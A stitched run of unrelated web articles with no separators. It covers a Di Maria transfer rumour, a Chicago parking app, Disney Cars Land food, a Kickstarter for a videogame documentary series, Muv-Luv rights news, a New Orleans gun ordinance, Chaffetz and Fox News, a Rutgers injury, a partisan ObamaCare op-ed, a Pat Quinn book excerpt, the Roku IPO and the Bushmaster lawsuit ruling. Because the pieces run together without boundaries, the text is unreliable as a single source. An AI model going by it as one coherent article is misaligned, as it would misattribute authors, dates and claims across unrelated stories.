Get the biggest Manchester United FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Real Madrid are bracing themselves for a United swoop for Angel Di Maria.
The Champions League winners are in action tomorrow in the Supercopa in Spain against rivals Atletico Madrid and the 26-year-old Argentine World Cup player is in the squad.
But Real's coach Carlo Ancelotti doesn't know whether the right winger will still be at the Bernabeu by the end of the summer transfer window.
In his press conference ahead of the first leg game against Atletico Ancelotti said: “I'm not entering into the issue Di Maria, because I'll lose focus on the game.
“I do not know what he has decided, I just know that he is ready to play, and until August 31 will be here in principle.
“If from there he stays or is no longer, we will think about it later.”
The door is clearly open for the Reds to pursue manager Louis van Gaal's big target, with Ancelotti failing to slap any kind of ‘not for sale' sign on the South American.
With Cristiano Ronaldo, Gareth Bale and new summer recruits Toni Kroos and James Rodriquez available to Ancelotti, Di Maria is feeling the heat.
Having won the Champions League last may in Lisbon, he will have to consider the fact United do not have that Euro platform on offer this season.
Paris Saint Germain were linked with Di Maria but pulled out of the running due to concerns over getting the wrong side of the Financial Fair Play rules because of Real's £50m valuation.
The Reds are still ploughing through the difficult transfer of Di Maria's fellow Argentine Marcos Rojo.
The defender's third party ownership is a financial complication at Sporting Lisbon's end but United are confident they will get there and land the 24-year-old.
Meanwhile Arturo Vidal, who has been linked with United all summer, is eager to play again after the World Cup and his Juventus boss Massimiliano Allegri believes the Italians will keep him.
“Arturo's spirits are very high. It's only normal that there is speculation about him. Big clubs are always looking for big players, but Vidal is already at a big club,” he said.
United still haven't made an official move for Ajax's left-back-cum-wing-back Daley Blind.
The 24-year-old was part of van Gaal's Holland squad at the World Cup and his father was one of the United manager's sidekicks in Brazil.
Ajax boss Frank de Boer accepts big money bid would land Blind - and that would be the kind of business, for a player he knows so well, Van Gaal reckons could be wrapped up in 24 hours as he told the press last Friday.
United faced Madrid on their American tour... see the pictures here:
ParkChicago App Comes to Northwest Side View Full Caption
EDISON PARK — Tech-savvy drivers who need to park on the Northwest Side can rejoice — the new ParkChicago mobile payment system expanded this week to the Jefferson Park Business District and downtown Edison Park.
The app eliminates the need to pay for parking at a pay box and to place a receipt on the dashboard. Drivers can pay for parking or extend parking time from anywhere using a smartphone, iPad or other tablet computer.
The new app aimed at helping you pay Chicago meters...comes with a subtle fee. Heather Cherone explains:
Edison Park Chamber of Commerce Executive Director Melissa Panizzi said she hoped the app would increase business for the shops and stores in downtown Edison Park, where the inconvenience and expense of the meters is a frequent complaint.
Earlier this year, the chamber bought a parking lot at Oshkosh Avenue and Northwest Highway to help shoppers beat the meters legally. Drivers can park there — and in a 16-space lot at 6718 N. Oliphant Ave. — for free.
As part of the app, a built-in timer will remind drivers 10 minutes before their time expires to allow them to add more time or get back to their car.
After downloading the app, motorists must create an account, which includes inputting credit or debit card information. Similar to the Illinois Tollway's I-PASS system, users are required to start with a minimum $20 balance, which is automatically replenished when it drops below $10, according to Burnham.
Once set up, in order to park, drivers must type in the six-digit zone number on the closest parking meter sign and then input their license plate number.
After a time is selected and the transaction is finished, a confirmation message is displayed, which can be emailed to the user. The app also gives drivers the flexibility to move their car within the allotted time and still be legally parked.
People without a smartphone can still use the service by calling 877-242-7901 and following the prompts.
There's no fee to use ParkChicago if a driver opts to pay for two hours of parking or more. However, there is a 35-cent fee for each time a driver pays less than the maximum time allowed. There is no limit on the number of times drivers can add time.
Mike Brockway of The Expired Meter contributed to this report.
The Disney Parks Blog clued us in on some of the fun food you'll be able to find in Cars Land this summer! Fingers crossed I can get out to Disney California Adventure in Disneyland Resort to try all of these goodies, but rest assured Heather will be there to sample a few for us!
Cozy Cone Motel
Start out your meal at the Cozy Cone Motel, where food is presented with a “cone” theme (think “chile cone carne” or “cone on the cob“!).
You'll also find a cone featuring flavored popcorn, including the fun bacon and cheddar version from the Bayou Bash as well as salt and vinegar, nacho cheese (YUM), sweet and spicy, and even pickle-flavored popcorn!!
Check out the cones as they're being built!
Fillmore's Taste-In
Fillmore's Taste-In, as it turns out, is going to be the place to get things that are a bit more healthy for you than a cone filled with frito pie. 😉 Because Fillmore is an advocate of natural and organic products in the film, you'll find good-for-you foods here like fresh fruit, bottled beverages, and juices.
Flo's V-8 Cafe
Flo's V-8 Cafe is the spot I'm really excited about!! The menu includes some seriously yummy words like brioche French toast served with salted caramel and bananas; and chicken tamales with scrambled eggs, salsa verde, and pico de gallo! For lunch, expect veggie-tater casserole, which includes roasted vegetables, bulgar wheat, Boca crumbles, and smashed red skin potatoes, all topped with melted cheddar!
For dessert — expect those pies we were telling you about! Here's a pic of the cherry!
I hope I get to high-tail it over to Cars Land this summer — fingers crossed I get one of those pies all to myself!
What menu items are you excited about in Cars Land? Let us know what YOU'LL be ordering!
All photos Copyright Disney
About
For something so ubiquitous in society today, it seems as though the definition of videogames has continuously eluded us.
More often than not, when we look at videogames, we bring with us a set of complex and diverse expectations based on our own experiences. From the clerks at your local retail shop to your favorite game studio, to the budding videogame programs at universities and the avant garde world of indie games, there are so many interpretations of "what's in a game" that it is easy to forget the big picture.
Let's discover What's in a Game? together. Whether you're a longtime gamer or you've never picked up a controller before, the world of videogames has something to offer beyond a passing curiosity. In this show we'll delve deeper into the fascinating world of videogames.
Born out of Cold War technology, videogames entered our homes as toys and ignited our imaginations. Out of this unique blend of design, technology, culture, and commerce emerged the most peculiar medium of our time. Now videogames have real implications on our lives, be it for purposes of entertainment, personal growth, expression, education, or our own livelihood.
Our debut trailer will give you a sense of what we'll be talking about.
In What's in a Game?, we'll examine the complex evolution of videogames over time, focusing on individual aspects of the medium. We'll jump through history as changes to the way we buy, play, talk about, and celebrate videogames developed, often as a direct result of changes to seemingly unrelated aspects of gaming, leading right up to and looking beyond the conditions videogames face today.
The videogame media often talks about videogames as products: whether you should buy this game or that one. We want to hear from game designers more conversationally, off the promotion junket. We're not going to focus on the individual game designer's personal struggles, but rather their history and thoughts as designers, developers, and entrepreneurs.
There's always been a strange segregation between indie games and mainstream games. We're covering both sides of the industry, and some tertiary arenas like educational software, interactive art, sports, and even carnivals and pinball.
We've already shot a lot of material, including interviews with
The kickstarter of Kickstarters, the legendary Tim Schafer .
. The folk hero who laid the foundations for this industry, arcades, and animatronic pizza restaurants, Nolan Bushnell .
. The wild genius behind Johann Sebastian Joust, Doug Wilson .
. The poet laureate of pixelantes everywhere, Anna Anthropy.
Thanks to our collaboration with Babycastles, New York City's indie arcade and art collective (oft quoted as "the CBGB's of videogames") we've seen videogames enter new environments such as New York University, art galleries and music venues, and cultural institutions like the American Museum of Natural History. In NYC, Babycastles works to revive the arcade by building social experiences with game designers like Ivan Safrin and Keita Takahashi.
What's in a Game? will explore a set of concepts that form the cornerstones of the videogame industry. Episodes will focus on topics such as economics, input & output, aesthetics, depictions of women, narratives, competition, and the art of building worlds.
Episodes are titled after simple concepts: elements of gaming that are easy to understand, yet particularly resonant to videogame's core audience.
We'll reveal more information about the episodes as the campaign moves along. Here's a brief overview of their content:
00. Press Start How a video series and social media can change games.
01. Points Why do we play? What good can come of videogames?
02. Coin How a single quarter became larger than all of Hollywood.
03. 2P Does play strengthen relationships? Videogames as social activity.
04. Button We talk to machines through controls, but how do they respond?
05. Pixel As we approach photorealism, will we revolt against the Uncanny?
06. EXP Can game help us grow? What can we learn from them?
07. Boss Everyone loves a villain. Duality and competition in videogames.
08. Princess Women in games. What a little diversity could bring to gaming.
09. Cake Gaming narratives and the precocious rituals of the gamer.
10. World Videogame's most unique asset. The power of mythmaking.
11. Continue? What challenges face us today? What will tomorrow bring?
We're a group of game designers and filmmakers who've been making, selling, and playing videogames for many years. We've been your retail store clerks, we've worked on your favorite games at Rockstar Games, Lucasarts, Eidos, and Acclaim, and we've been supporting the culture at Tech TV, G4, Games for Change, and Babycastles. Videogames are our live's work.
We're united by a common goal: we want everyone to enjoy videogames as much as we do and we want to encourage those people to make videogames themselves, and in turn expand the audience of videogames well beyond its current boundaries. Not only do videogames offer cultural capital to society, but their economic capital is suddenly an open world of possibilities for creative people from all walks of life.
Initially, we were asked to put this show together for a major videogame publication. That partnership did not come to fruition, but we see great potential in this project and continue filming on our own dollar.
To go any further, we need to buy equipment, pay for travel and rental fees, and bring on additional crew members to help us flesh out the show in the way it deserves to be.
If we can demystify videogame design and encourage viewers to understand games on a deeper level, then we'll truly have a videogame-literate culture where the only limit on what we can play will be our own ideas.
By backing our project in any capacity, you'll be invited to participate in the Gameifesto Beta program, a social network we've built for aspiring game developers of all skill levels. Part matchmaking service, part portfolio; you bring your skills and interests to the table to find other people to create games with. Artists, programmers, actors, sound engineers- whatever your skills are, you can get involved with making your own games at Gameifesto. Along the way, we'll help you pool your social media presence together and promote your projects to maximize your impact on the gameosphere.
Reaching our goal will allow us to dedicate more time to wrapping up the series and put together new segments with the material we already have- about five episodes worth. With additional backing, we can make up to eleven episodes set outside of New York City to see what's going on with videogames in other cities like Montreal, Toronto, Chicago, Austin, Los Angeles, San Francisco, Seattle, and Vancouver.
When we reach certain campaign goals, we'll be able to do bigger things with the show, which we'll announce along the way.
For every $5,000 we make beyond our goal, we'll make another episode.
Producers and Sponsors can help us bring additional episodes on when we reach our goal.
In return, we have a multitude of rewards to offer you- including a beta account for Gameifesto, video downloads, access to bonus content, progress updates, and silkscreen posters. We'll also have bonus rewards: Early Bird Game Bundles which include either RECURSE, a wild party game for the iPad featured in the show by Lumarca creator Matt Parker, and MIRACLE ADVENTURES IN 2113, by BaraBariBall creator Noah Sasso. We'll also have handmade silkscreened posters available, with artwork from the show.
Pledge $20 or more and you'll be able to select one of the games packages. Only 60 available!
Here's an early mockup. Not final art.
We're also offering one 30-second advertising slot per episode, where we'll produce a custom spot for your project, game, or whatever you want to promote, as long as it is videogame-related. We'll do a quick interview with you or show a preview of your work. You can also become an Executive Producer, and we'll consult you on what you think the show should talk about for your given episode.
Plus, you'll play your part in making this show a reality. Thanks to the magic of Kickstarter, your backing will make this show a reality. We appreciate you taking a look, and hope that we can make this happen together!
Colin Snyder & The What's in a Game? Crew
How has the natural gas boom changed life near you? Join the conversation on Twitter by using the hashtag #NPRBoomTown .
Sales taxes collected in Bradford County jumped 61% from 2009 to 2012 - despite the recession.
‘Dry' Gas, ‘Wet' Gas, and Why Drilling Has Slowed Around Towanda
About this project
"Boomtown" was published on 12/6/12. It was reported by StateImpact Pennsylvania's Scott Detrow, photographed by NPR's Becky Lettenberger. The project was produced by Wesley Lindamood, Christopher Swope, Claire O'Neill, Jessica Pupovac, Yan Lu and John Stefany.
Historical Towanda photos, courtesy of the Bradford County Historical Society. Music: “Longing For Home” by George Stehl, Marshall Lufsky and Paul Smith, "II //\\ II" by Discount Fireworks. Data on Bradford County sales tax receipts are from the Pennsylvania Department of Revenue. Data on Bradford County criminal caseload are from the Bradford County District Attorney.
Game developer Age launched a survey on Wednesday that notes that, under the recent acquisition of Age's Ixtl rights management company by media company Avex Pictures, Age "intend[s] to pursue anime and game adaptations of [its] core business content while simultaneously engaging in active overseas development." The survey also asks participants to determine which topics will be discussed during its talk event at Tokyo Game Show on September 24. The talk will be livestreamed.
Age also posted an equivalent survey in Japanese.
Age founded ixtl in 2011 as a rights management company for its intellectual property, particularly for the Muv-Luv franchise. That franchise has since spawned sequels, spinoffs, adaptations, and derivative works, including the Muv-Luv Alternative: Total Eclipse and Schwarzes Marken television anime, for which it is also credited for animation production. ixtl still releases games under the Age brand name.
Avex Pictures previously managed the distribution for many ixtl products, including game software, anime home video releases, music CDs, and other merchandise.
Publisher Degica and developer Ixtl launched the Kickstarter to localize Koki Yoshimune's Muv-Luv ( Muv-Luv Extra and Muv-Luv Unlimited ) and Muv-Luv Alternative visual novels in September 2015. The campaign met its initial goal of US$250,000 within eight hours, and ultimately raised US$1,255,444.
Muv-Luv Extra and Muv-Luv Unlimited launched on Steam in English in July 2016. Muv-Luv Alternative , the last game in the series, will launch on September 18.
Aside from the Muv-Luv franchise, Age's Kimi ga Nozomu Eien visual novel and its spinoff Akane Maniax also inspired anime adaptations. Funimation released Kimi ga Nozomu Eien with the title Rumbling Hearts , and the visual novel also inspired the Kimi ga Nozomu Eien ~Next Season~ OVA, and the Ayumayu Theater anime.
Thanks to invalidname for the news tip.
NEW ORLEANS -- As expected, Mayor Mitch Landrieu signed a safety ordinance Monday, strengthening gun laws in the city.
The City Council unanimously passed the measure, which requires gun owners to report when their weapons are lost or stolen within 48 hours.
If the gun is not reported stolen, first offenders will receive a $250 fine and subsequent offenders will receive a $500 fine.
Officials said the ordinance aims to reduce the number of guns in the city that end up in the hands of criminals.
The ordinance also places new restrictions on those convicted of domestic violence, keeping them from purchasing a gun. It also outlaws possession of a firearm without a serial number.
It also makes all NORDC facilities gun-free zones. Violation of this ordinance carries a $500 fine or six months in jail.
“Public safety is our top priority, and in order to keep our citizens safe, we must do everything we can to promote gun safety and reduce gun violence on our streets and in our community,” said Mayor Landrieu.
Officials said the ordinance should help NOPD keep a record of guns that have been reported stolen or lost and where they originated from.
Utah Rep. Jason Chaffetz (R) announced earlier this year that he would not be running for re-election in next year's mid-term elections and would not seek further political office, saying he wants to pursue a career in the private sector.
"After long consultation with my family and prayerful consideration, I have decided I will not be a candidate for any office in 2018," Chaffetz said last month.
Following the announcement, the rumor mill immediately began to churn. Some politicos said Chaffetz is eyeing a run at the Utah governorship in 2020, but Chaffetz quelled those rumors.
"For those that would speculate otherwise, let me be clear that I have no ulterior motives. I am healthy. I am confident I would continue to be re-elected by large margins. I have the full support of Speaker Ryan to continue as Chairman of the Oversight and Government Reform Committee. That said, I have made a personal decision to return to the private sector," he wrote on Facebook.
"By announcing now, I hope to give prospective candidates time to lay the groundwork for a successful run," Chaffetz explained.
But now a report from the Washingtonian reveals that Chaffetz may indeed be heading to the private sector to work for none other than Fox News, the most popular cable news network that is most friendly to Republicans, conservatives and President Donald Trump.
From the Washingtonian:
According to two GOP lawmakers who have spoken to Chaffetz directly and four senior House Republican aides, Chaffetz has been telling people he'll take on what one source calls a “substantial role” in on-air talent at Fox News Channel, possibly as early as July, amplifying whispers that Chaffetz will not finish out his current term.
Indeed, the day that Chaffetz announced his decision to not run for re-election in 2018, Fox News announced that Bill O'Reilly would not be returning to the network amid a sexual harassment scandal. Still, its unclear what role Chaffetz would play at Fox News should he find employment at the network after he leaves Congress.
If Chaffetz does leave Congress to head for Fox, Republican congressional aides wouldn't find it surprising.
"Let's just say that when Jason told us he was headed to Fox, no one was surprised," one aide told the Washingtonian.
"He's probably one of the most media-capable members in the House," another aide added, noting the amount of time Chaffetz has spent on cable news networks during his time in Congress.
"I know he was gunning for it...Fox was his first choice once he announced his plans," explained a House Republican member "close to Chaffetz."
If Chaffetz were to head to Fox, he wouldn't be the first member of Congress or politician to do so. Noteable former politicians to be employed by the network currently or in the past include former Gov. Mike Huckabee (R-Ark.), former Sen. Scott Brown (R-Mass.) and Newt Gingrich (R-Ga.).
PISCATAWAY -- Darius Hamilton, who was listed as questionable on the injury report for Saturday's game against Kansas, will miss the rest of the season, the Rutgers athletics department announced.
The star senior defensive tackle will be sidelined due to a lower body injury, Rutgers said in a statement.
Voted a team captain for the second-straight year, Hamilton was limited to about 15 snaps and couldn't make a significant impact in the 28-3 loss to Penn State last Saturday.
Two days later, Hamilton walked with a pronounced limp and was listed as questionable on the injury report for the game at Kansas.
PLUS: Could injure Rutgers defensive tackle Darius Hamilton redshirt this season?
"I was probably out there before I should have been out there," Hamilton said on Monday. "But that's on me. I wanted to be a part of that. I'm just trying to get healthy."
Hamilton conceded the possibility of missing the rest of the season and taking a redshirt in order to retain his final year of eligibility.
"I understand that's an option, if necessary," Hamilton said. "I really haven't explored that one too much, but like I said before, if the time comes to that, then we'll explore it.''
The NCAA allows hardship waivers to players who suffer a season-ending injury and haven't used a redshirt year. That condition should apply to Hamilton, who ended up playing only one game this season.
Hamilton said he is on track to graduate this spring. That would open the door to potentially landing at another school as a graduate transfer for his final season of eligibility. But Hamilton doesn't appear to have any intention of finishing his career anywhere but Rutgers.
"At the end of the day, worst comes to worst, you redshirt and I'm here for another year," Hamilton said. "Worst comes to worst, I'm here with people who I came in with and get to enjoy football one last time for Rutgers."
Hamilton served as an every-down lineman and team captain last season, earning All-Big Ten status in the media vote and winning Defensive MVP at the team banquet. He led the squad with 11.5 tackles-for-loss with six sacks, posting 45 stops overall.
For his career, Hamilton has 110 total tackles in 39 games. He has 24.5 tackles for loss and 10.5 sacks.
Keith Sargeant may be reached at ksargeant@njadvancemedia.com. Follow him on Twitter @KSargeantNJ. Find NJ.com Rutgers Football on Facebook.
The Republican efforts to repeal and replace the Affordable Care Act have ended in a resounding failure last night and today. The American people should be gleeful that we have dodged a bullet — for now — that would have made us sicker and poorer as a country.
But this should not have been a surprise to anybody. The fact that repealing and replacing ObamaCare would be difficult was an understatement to begin with.
ADVERTISEMENT
The fact that Republicans went for it in the manner that they did and that Trump played a supporting role for a plan that would break some of his fundamental campaign promises — to not touch Medicaid and to cover all Americans — speaks to the very heart of the problem in our nation's capital. The Republicans in Congress and President Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say he should get less than 10 years in prison MORE are clueless when it comes to leading, hopeless when it comes to governing and in dire need of a strong moral compass with a true north that points to the best interest of the American people.
They are in over their heads, completely unprepared and wholly unfit to hold a majority in Congress or to occupy the Oval Office.
For seven years, Republicans have been railing against ObamaCare. While President Obama was in office, they passed a repeal bill in the House more than 60 times, knowing full well it would never get signed into law.
But instead of spending that time trying to seriously come up with an alternative that would work, they spent their political capital howling at the moon, promising to make Obama a one-term president (I am talking to you Senate Majority Leader Mitch McConnell Addison (Mitch) Mitchell McConnellHouse to push back at Trump on border Democrats block abortion bill in Senate Overnight Energy: Climate protesters storm McConnell's office | Center-right group says Green New Deal could cost trillion | Dire warnings from new climate studies MORE (R-Ky.) ), raging against anything President Obama did and spending millions of taxpayer dollars on an unnecessary Benghazi investigation that ended in a thud. Talk about nothing burgers.
So they have no one to blame but themselves as they experience the spectacular failure of trying to fulfill a 7-year-old blood oath. Now, they actually have the White House, both chambers of Congress and the eyes of the world fixed on them to see if they have what it takes to lead.
They have proven so far that they do not.
They should have listened to their own former Speaker of the House John Boehner John Andrew BoehnerEx-GOP lawmaker joins marijuana trade group Crowley, Shuster moving to K Street On unilateral executive action, Mitch McConnell was right — in 2014 MORE (R-Ohio), who, when free from the speakership, finally spoke truth and proclaimed that full repeal and replace of ObamaCare is “not what's going to happen.” He admitted that what would ultimately happen is that Republicans would end up fixing the pieces of ObamaCare that aren't working that well.
Yes! Let's do that Republicans and Donald Trump! Democrats will work side-by-side with you on this for the good of the American people!
Alas, it is Donald Trump we are talking about.
He does not do anything “for the good of the American people.” He does everything for the advancement of Donald Trump. In the face of a second defeat of the GOP healthcare bill and having just heard that repeal alone of ObamaCare is not something Republicans will agree on, he just called on Republicans to “just let ObamaCare fail.”
Think about this for a minute. The president of the United States wants to hurt millions of Americans, sentencing many to their deaths, just to spite the sensible Republicans who refused to let their constituents die by supporting any version of the immoral GOP healthcare bill and to spite Democrats who, from the beginning, have refused to repeal the Affordable Care Act that has given healthcare to more than 22 million Americans.
What a leader!
How about this Mr. President? You stop doing everything in your power to sabotage ObamaCare, which you have done from the moment you entered the Oval Office. Stop refusing to advertise enrollment on the exchanges. Stop refusing to enforce the individual mandate, which is what will help make the exchanges solvent and viable for years to come. Stop threatening to withhold the subsidies to health insurance companies they were promised under ObamaCare in order to cover low-income Americans at lower rates.
All of the above actions have injected a poisonous brew of uncertainty into the marketplace that has led to insurers withdrawing from markets, leaving the exchanges and hiking up their premiums.
But don't take my word for it, just listen to insurance company CEOs and state insurance commissioners, many of whom are Republican. They have complained loudly and on-the-record that the Trump administration has caused the kind of uncertainty in the markets that has forced them to retreat from certain markets and raise prices.
This is NOT ObamaCare imploding or collapsing on its own weight. It is Trump and Republicans killing it softly and behind the scenes and then cleaning the crime scene with bleach and screaming that ObamaCare is dying of its own failures.
Ironically, in spite of Republicans doing everything they can to kill ObamaCare (since they can't do it legislatively), it seems the healthcare exchanges are actually stabilizing and people are continuing to sign up for the program.
So how about this, House Speaker Paul Ryan Paul Davis RyanBrexit and exit: A transatlantic comparison Five takeaways from McCabe's allegations against Trump The Hill's 12:30 Report: Sanders set to shake up 2020 race MORE (R-Wis.) and McConnell — act like leaders! Take Sen. Chuck Schumer Charles (Chuck) Ellis SchumerBrennan fires back at 'selfish' Trump over Harry Reid criticism Trump rips Harry Reid for 'failed career' after ex-Dem leader slams him in interview Harry Reid: 'I don't see anything' Trump is doing right MORE (D-N.Y.) at his word and start working with Democrats to fix the Affordable Care Act and give the American people what they deserve — public servants who actually serve the public and not just their own self-interest or that of their party.
This is not a partisan issue. It is an issue of humanity. It is an issue of morality. It is time for the Republican leadership and the White House to prove they have some semblance of both — even if just a smidgen — running through their blood.
Maria Cardona is a principal at the Dewey Square Group, a Democratic strategist and a CNN/CNN Español political commentator. Follow her on Twitter @MariaTCardona.
The views expressed by contributors are their own and not the views of The Hill.
He sat in the same spot every night, puffing his cigar in the February chill.
A year from 60, hair full white, Pat Quinn faced the most daunting task he'd experienced in a quarter-century of coaching. It had been 50 years since Canada had won the Olympic gold medal in the sport the nation claimed as its own.
Quinn had been just a kid skating at Mahoney [the park next to his boyhood home] when the Edmonton Mercurys brought home gold from the 1952 Olympics in Oslo, Norway. He had barely noticed it then, when the tournament was played by amateurs. But every day leading to Salt Lake, Quinn was reminded of the great gap between the last gold and now.
Canada's claim to hockey supremacy had been severely damaged by the 1998 Olympics in Nagano, where the nation's best finished fourth. Salt Lake was about righting that wrong. Nothing but gold would atone for what wasn't won four years before.
Every night, Quinn sat on that bench in front of the Canadian Olympic team quarters, puffing clouds of smoke into the dark sky as the nation's finest athletes stopped to confide in him their fears and anxieties. His evening chats with the athletes who passed by became so common that volunteers put a “Pat's bench” sign over the spot where Quinn always sat. He'd ask them questions about their lives and share stories of his own. Mostly, though, he'd listen.
Quinn had great respect for the young athletes representing their country, who battled to achieve their dreams with little financial reward, if any. The “Big Irishman” was a figurehead for the entire country at the Olympics. Heroes like Wayne Gretzky were certainly an inspiration, but Quinn was something different—he was a force of stability and confidence. He reflected a Canadian ideal: not necessarily the most talented, but nevertheless unrelenting in the pursuit of greatness.
While he could be hard on his own players, Quinn didn't have the expert knowledge of the sports the other athletes played. And so he just listened and learned, offering some of the philosophical and physiological advice he'd gathered through a lifetime in sport. He sat with snowboarder Jasey-Jay Anderson, who knew nothing about hockey and didn't follow the NHL.
When freestyle skier Steve Omischl sat next to him, they spoke for more than an hour. The 23-year-old had just crashed in the first round of his event and placed 11th. He was devastated. While his own coaches only wanted to talk about what had gone wrong, Quinn told him that all the hype and stress were just distractions. He told Omischl not to worry about the media, not to worry about his coaches—not to worry about the expectations that come with a nation expecting success.
“Don't worry about what other people think,” Quinn told him. “Just do what you need to do to get the job done.”
The sparkles on Quinn's socks were evidence that he'd taken his own advice. Quinn had been chosen by the greatest hockey player in the game's history to lead a team stacked with some of the best players of a generation — Mario Lemieux, Joe Sakic, Rob Blake, Martin Brodeur — into a tournament where a single game could forever put an asterisk of failure next to your legacy in the game.
If Team Canada failed to win gold — even if it won something less, even silver — the disastrous outcome would be pinned on Quinn. “How could Quinn lose with a lineup like this?” the radio hosts and columnists would bray. Others would certainly feel the wrath, but as head coach, every move Quinn made would be dragged out and judged, endlessly. Quinn was the captain of this ship. He knew it. But he wasn't bothered by it.
Quinn was used to the outsized overreactions of both Toronto and Vancouver, among fans and in the press. And he knew this was an incalculable exponential of that. Despite that, sparkles fell from Quinn's slacks as he walked. They were affixed to his lucky socks and briefs — a gift from his grandkids, decorated with love and glitter glue.
Along with his six-year-old grandson, Quinn, he now had two granddaughters — four-year-old Kate and Kylie, who was just six months old. While some knew about the lucky socks Quinn wore for every game he coached at the Olympics, only a few would learn of the shimmering tighty-whities beneath his suit.
Canada was moments away from a gold medal.
In the stands, Sandra Quinn watched as the final seconds ticked away toward the end, just as she had almost 40 years before when her newlywed 20-year-old husband was about to win the Memorial Cup. The Canadian fans in the crowd bellowed out celebratory renditions of “O Canada.”
Before the game, Quinn had turned to Keith Hammond, who sat behind the bench for security, and asked him to make sure he could bring Sandra, Kalli and Valerie down to the ice if the team won. When Canada's victory was clear, Hammond ran up to the concourse to find them waiting at a security checkpoint, unable to pass. Hammond pulled them through security and raced with them down to the ice to watch the final seconds tick away.
As the players piled onto the ice, Sandra and her daughters climbed onto the bench and embraced Pat. They stayed on the bench while the gold medals were presented and the national anthem played.
Back in Burlington, Ont., the friends and family gathered at Barry Quinn's [Quinn's brother] place started a celebration of their own. They were cheering and clapping and laughing as the announcer called out the last moments of the game. In the revelry, Jack Quinn [Quinn's father] got out of his chair and walked over to Jean [Quinn's mother] and hugged her close.
When the players crowded in to take a team photo with their gold medals, Quinn shuffled over to the bench and grabbed Kalli to be part of the picture. (He always told her to make sure she was in the centre of photos, so she couldn't be cut off the ends.) When the flashes went, Kalli was right there in the middle next to her dad, with his puff of white hair, bright-red cheeks and an enormous smile.
A few minutes later, as Jack and Jean gathered their things, put on their winter coats over their Canada sweaters and made for their green van, the phone rang in Barry's kitchen. “Is mom there?” It was Pat.
The cordless was rushed outside to Jean, just as she was about to climb into the front seat. He'd called. Of course he had. Patrick always did. Jean took the phone and spoke to her boy. The words were brief, but full and complete — and proud Jean Quinn started to cry.
No reporters were allowed in the locker room. The players and the team staff were free to celebrate on their own. But the room was very quiet. Most of the players for Team Canada just sat in their stalls staring at their gold medals, shaking their heads at what they'd just accomplished. The best hockey players in Canada, the best in the world, seemed astonished by the feeling.
Pat Quinn sat in the corner, with that huge smile still stretched between his round cheeks. Wayne Gretzky and Bob Nicholson sat down beside him. After all the pressure, all the planning, all the concerns and doubt — the players had done it.
“It felt like it was the first time I won the Stanley Cup,” says Gretzky. “It was almost surreal.”
The three sat there and cracked open a few beers. Quinn thanked Gretzky for giving him the chance to be Canada's coach.
Then they just sat there, drinking it in, and didn't say much at all—as Quinn's socks twinkled beneath them.
Excerpted from Quinn: The Life of a Hockey Legend,
by Dan Robson. Copyright © 2015 Dan Robson. Published by
Viking Canada, a division of Penguin Random House Canada Limited. Reproduced by arrangement with the Publisher. All rights reserved.
Roku has filed for an initial public offering and is looking to raise up to $100 million. The company will be listed on the NASDAQ appropriately under the ticker of ROKU.
We reported in July that Roku was planning an IPO in 2017. Roku has been able to capitalize on the cord-cutting trend, where many people, especially millennials, have opted not to pay for cable television. Instead, they are accessing content on digital platforms like Roku, Apple TV, Google's Chromecast, Amazon's Fire TV and others. Roku is the No. 1 streaming device when measured by total hours streamed.
This has been a long time coming. Roku was founded in 2002 and raised over $200 million from various VCs and investment firms. The company was key in helping create the home streaming device market. It was one of the first devices to target general users rather than the technically savvy. Roku never left that demographic.
Today the company claims to have 15.1 million accounts and stream quarterly 3.5 billion hours of content, which is up 60 percent year-over-year.
Menlo Ventures looks to be the largest shareholder with a 35.3 percent stake, followed by Fidelity with 12.9 percent, Twenty-First Century Fox at 7 percent and Globespan Capital Partners at 6.1 percent.
Roku states its average revenue per unit is $11.22, up 35 percent. It reported $199 million in revenue in the six month period ending June 30, 2017, up from the year prior of $162 million. Its annual revenue numbers also increased year-over-year, up from $319 million to $398 million.
The company's primary gross profit source is switching from hardware sales to its platform, mainly around advertising and subscription revenue. In January 2017, hardware sales represented 19 percent of total gross profit while down 28 percent. Meanwhile, the platform gross profit represented 81 percent of the total, up 104 percent from the six months prior.
Roku is looking to go public at the same time as two other hardware startups-turned public companies are struggling. GoPro and Fitbit flipped the switch in 2014 and 2015, respectively, and after a brief pop, both company's stock crashed and have yet to recover. Clearly Roku is looking for a different outcome.
One more thing, we agree with Leslie over at CNBC.
Back in April I wrote about the ongoing lawsuit against Bushmaster which looked to hold the company accountable for the shootings at Sandy Hook Elementary School. The judge in that case, Barbara Bellis, had heard a motion from the defendants to have the suit dismissed because it would have violated the protections given to gun manufacturers under the Protection of Lawful Commerce in Arms Act (PLCAA).
The judge refused the request on technical grounds, not for a lack of merit, but because the wrong sort of motion had been filed. As the NRA Institute for Legal Action happily reported, the interested parties were back in court yesterday with the proper documents and the judge has essentially ended the case against Bushmaster.
This afternoon, a judge issued a ruling in the case, Soto v. Bushmaster, that held the defendants were entitled to immunity from the suit. The defendants in the case originally asked the court to dismiss the complaint under the Protection of Lawful Commerce in Arms Act (PLCAA), which was enacted in 2005 to prohibit frivolous suits against firearm makers for criminal acts committed with their products by unaffiliated third parties. In April, the court in the Soto case issued a highly technical ruling that found the defendants had filed the wrong type of motion to invoke the protections of the PLCAA. The court at that time expressed no opinion on the merits of either the complaint or the defenses. The defendants renewed their claim of immunity under the PLCAA, this time by filing “motions to strike” the plaintiffs' claims.
This time the response from the court wasn't quite so bogged down in technical terminology and finally addressed the common sense questions which many of us were asking in April. The wording of the PLCAA is quite clear and understandably by those without legal degrees or a fluency in Latin. The judge went on to provide an equally simple explanation of why the plaintiffs are now essentially out of options.
Congress, through the Protection of Lawful Commerce in Arms Act … has broadly prohibited lawsuits “against manufacturers, distributors, dealers, and importers of firearms … for the harm solely caused by the criminal or unlawful use of firearm products … by others when the produced functioned as designed and intended.” … The present case seeks damages for harms … that were caused solely by the criminal misuse of a weapon by [the perpetrator of the Newtown slayings]. Accordingly, this action falls squarely within the broad immunity provided by the PLCAA.
